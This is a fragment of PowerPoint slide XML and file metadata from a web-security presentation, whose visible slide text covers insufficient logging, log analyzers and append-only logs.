          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4085706" y="607125"/>
            <a:ext cx="402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Insufficient Logging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86D76-F5CC-4587-8306-84CE04BA5A77}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="524436" y="1843950"/>
            <a:ext cx="751340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analyzers to find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stack traces where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 web server 404, 403,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Append-only logs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C97606-D43C-47CE-B1F0-F8891A64AA84}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6251816" y="2151726"/>
            <a:ext cx="5694047" cy="3785652"/>
            <a:chOff x="4675909" y="759870"/>
            <a:chExt cx="5694047" cy="37856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54989B-0984-48AB-9EC5-5A1B245D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09" y="759870"/>
              <a:ext cx="5694047" cy="37856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912A9-D3C5-4BEC-BEE0-38D3DFAB9AE1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6251810" y="2652696"/>
              <a:ext cx="31628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anose="020B0503030403020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Insufficient Logging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423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3283</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>673</Paragraphs>
  <Slides>106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7" baseType="lpstr">
      <vt:lpstr>Gulim</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Arial Unicode MS</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>CordiaUPC</vt:lpstr>
      <vt:lpstr>Myriad Arabic</vt:lpstr>
      <vt:lpstr>Myriad Pro</vt:lpstr>
      <vt:lpstr>Myriad Pro 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 Karunaratne</dc:creator>
  <cp:lastModifiedBy>Ayesh Karunaratne</cp:lastModifiedBy>
  <cp:revision>212</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-11-11T09:46:14Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-11-17T10:18:37Z</dcterms:modified>
</cp:coreProperties>
</file>